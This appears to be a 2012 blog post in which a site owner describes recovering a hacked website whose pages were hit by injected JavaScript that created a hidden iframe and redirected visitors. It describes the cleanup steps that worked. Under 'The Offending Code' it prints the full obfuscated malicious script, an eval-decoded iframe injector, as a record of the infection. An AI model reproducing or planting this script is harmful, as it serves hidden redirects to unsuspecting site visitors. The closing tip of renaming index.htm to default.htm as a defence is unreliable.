ArtsAutosBooksBusinessEducationEntertainmentFamilyFashionFoodGamesGenderHealthHolidaysHomeHubPagesPersonal FinancePetsPoliticsReligionSportsTechnologyTravel
  • »
  • Technology»
  • Internet & the Web

Hidden iFrames = Hidden Demons!

Updated on July 11, 2012

Setting the Scene

Following an extended period of disuse, I recently returned to one of my domains to completely overhaul and update it. Everything was as I'd left it except for a line of text at the top of the page that read:

you must pay for this crypt

A quick search proved that I'd been hacked and that this was malware. I don't know how long it had been there or how much damage this simple line of text had or could cause, but I certainly knew that I needed it gone. Now.

I connected immediately through my FTP program and deleted all my files. Naively assuming that the issue had been solved, I created a new two-page website and uploaded my files.

Checking it on various computers and browsers, the website looked great. I went back later that day to do some tweaking and was a bit surprised to see that only my background image remained. Everything else was missing. The table, my title image, my Adsense ad, my text, everything gone.

Again, naively assuming that I'd made a mistake, I uploaded my files again and completely the tweaks that I'd intended.

The following morning, I checked in again and my website again had only the background image. I knew then that this was not my mistake. Someone or something had access to my website.

First Attempt at a Fix

I started by uploading the website, again and again. It seemed that my website was disappearing (well, all except the background image) after 6 to 8 hours. There was no redirect or strange ads or text to replace my content on the site. And the code looked strange, with a blob of Javascript seeming to be the offending item, not originating from me.

Googling about the script or the symptoms brought few helpful results.

My next step was to change my passwords, starting with my FTP password and then my login password for my webspace provider account.

When that did not solve the issue, I called my webspace provider for assistance. Five times in total, with an email to their technical support people and finally to their security team. They were unhelpful, only reporting that no other IP address had uploaded to my webspace and that the issue was likely to be code-related and as such, out of their remit.

Getting Worse

Then I started seeing a flash of my background image followed quickly by a redirect to a website I'd never heard of.

My webspace provider had sent me a form letter email where they mentioned Code Injection and Remote File Inclusion but neither seemed exactly what I was going through and they were not interested in any further help.

The Offending Code (scroll right)

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<body bgcolor="#CCCC66" text="#006600" background="images/bg.jpg" link="#009933"> <script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c7 5c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h)e(s);</script>
<div align="center">
<p><font size="7">This is crazy! <br>
Leave my site alone!</font></p>

A Shining Light on a Dark Day

I sent a message to a friend who I knew was web-savvy and who had worked in the web design field. He showed suitable sympathy and gave me a few suggestions of where to look for the answer.

He wrote:

I suspect what that Javascript is doing is, when it runs in the browser, it is corrupting the page by adding a "hidden iframe" into which is loaded a page that redirects you. Googling the term "hidden iframe" will give you more info.

Doing as I was told, I Googled "hidden iframes´╗┐" and landed here. This fantastic fellow then led me to the root of my problem and ultimately got me my website back. I must remember to send My Hero a big, fat cyber kiss!

The Solution

My Hero's steps for removing hidden iframes

  1. Do a full system scan. I did this and it took 6 hours, but it was well worth it. I found 4 malicious files, including 3 with 'Javascript' or 'JS' in the title and one with 'iframe' in the title.
  2. Change your FTP password.
  3. Keep the password secure by not clicking on 'save password'. Taking the time to type it in every time you want to access the webspace means that it will be difficult for hackers to steal it.
  4. If you can, do not use the FTP protocol. Instead, try to use the more secure SFTP or FTPS.

Finding these four malicious files and not saving my password has allowed me to regain control of my website.

It's a fabulous feeling!


UPDATE: A few weeks later...

I've had another attack on website since I wrote this hub. The symptoms were identical to last time, causing me immense frustration.

Only my index.htm page was ever affected and it got me to thinking that the attacker's code was likely written to affect pages with that name, or close variations like index.html. So I deleted my index page and saved it again using the name default.htm, which a browser also recognizes as the front page of a website.

Two weeks later, my website is still up and running. Could it be that bozo cyber attackers have written code for a relentless onslaught and have omitted to include default.htm? I'll go with that assumption for now!


    0 of 8192 characters used
    Post Comment

    • profile image

      Giselle Maine 6 years ago

      Fascinating... I think this will be very helpful for website owners. I'm glad you were able to solve and fix the problem in the end. I liked the step-by-step description of what happened.


    This website uses cookies

    As a user in the EEA, your approval is needed on a few things. To provide a better website experience, uses cookies (and other similar technologies) and may collect, process, and share personal data. Please choose which areas of our service you consent to our doing so.

    For more information on managing or withdrawing consents and how we handle data, visit our Privacy Policy at: ""

    Show Details
    HubPages Device IDThis is used to identify particular browsers or devices when the access the service, and is used for security reasons.
    LoginThis is necessary to sign in to the HubPages Service.
    Google RecaptchaThis is used to prevent bots and spam. (Privacy Policy)
    AkismetThis is used to detect comment spam. (Privacy Policy)
    HubPages Google AnalyticsThis is used to provide data on traffic to our website, all personally identifyable data is anonymized. (Privacy Policy)
    HubPages Traffic PixelThis is used to collect data on traffic to articles and other pages on our site. Unless you are signed in to a HubPages account, all personally identifiable information is anonymized.
    Amazon Web ServicesThis is a cloud services platform that we used to host our service. (Privacy Policy)
    CloudflareThis is a cloud CDN service that we use to efficiently deliver files required for our service to operate such as javascript, cascading style sheets, images, and videos. (Privacy Policy)
    Google Hosted LibrariesJavascript software libraries such as jQuery are loaded at endpoints on the or domains, for performance and efficiency reasons. (Privacy Policy)
    Google Custom SearchThis is feature allows you to search the site. (Privacy Policy)
    Google MapsSome articles have Google Maps embedded in them. (Privacy Policy)
    Google ChartsThis is used to display charts and graphs on articles and the author center. (Privacy Policy)
    Google AdSense Host APIThis service allows you to sign up for or associate a Google AdSense account with HubPages, so that you can earn money from ads on your articles. No data is shared unless you engage with this feature. (Privacy Policy)
    Google YouTubeSome articles have YouTube videos embedded in them. (Privacy Policy)
    VimeoSome articles have Vimeo videos embedded in them. (Privacy Policy)
    PaypalThis is used for a registered author who enrolls in the HubPages Earnings program and requests to be paid via PayPal. No data is shared with Paypal unless you engage with this feature. (Privacy Policy)
    Facebook LoginYou can use this to streamline signing up for, or signing in to your Hubpages account. No data is shared with Facebook unless you engage with this feature. (Privacy Policy)
    MavenThis supports the Maven widget and search functionality. (Privacy Policy)
    Google AdSenseThis is an ad network. (Privacy Policy)
    Google DoubleClickGoogle provides ad serving technology and runs an ad network. (Privacy Policy)
    Index ExchangeThis is an ad network. (Privacy Policy)
    SovrnThis is an ad network. (Privacy Policy)
    Facebook AdsThis is an ad network. (Privacy Policy)
    Amazon Unified Ad MarketplaceThis is an ad network. (Privacy Policy)
    AppNexusThis is an ad network. (Privacy Policy)
    OpenxThis is an ad network. (Privacy Policy)
    Rubicon ProjectThis is an ad network. (Privacy Policy)
    TripleLiftThis is an ad network. (Privacy Policy)
    Say MediaWe partner with Say Media to deliver ad campaigns on our sites. (Privacy Policy)
    Remarketing PixelsWe may use remarketing pixels from advertising networks such as Google AdWords, Bing Ads, and Facebook in order to advertise the HubPages Service to people that have visited our sites.
    Conversion Tracking PixelsWe may use conversion tracking pixels from advertising networks such as Google AdWords, Bing Ads, and Facebook in order to identify when an advertisement has successfully resulted in the desired action, such as signing up for the HubPages Service or publishing an article on the HubPages Service.
    Author Google AnalyticsThis is used to provide traffic data and reports to the authors of articles on the HubPages Service. (Privacy Policy)
    ComscoreComScore is a media measurement and analytics company providing marketing data and analytics to enterprises, media and advertising agencies, and publishers. Non-consent will result in ComScore only processing obfuscated personal data. (Privacy Policy)
    Amazon Tracking PixelSome articles display amazon products as part of the Amazon Affiliate program, this pixel provides traffic statistics for those products (Privacy Policy)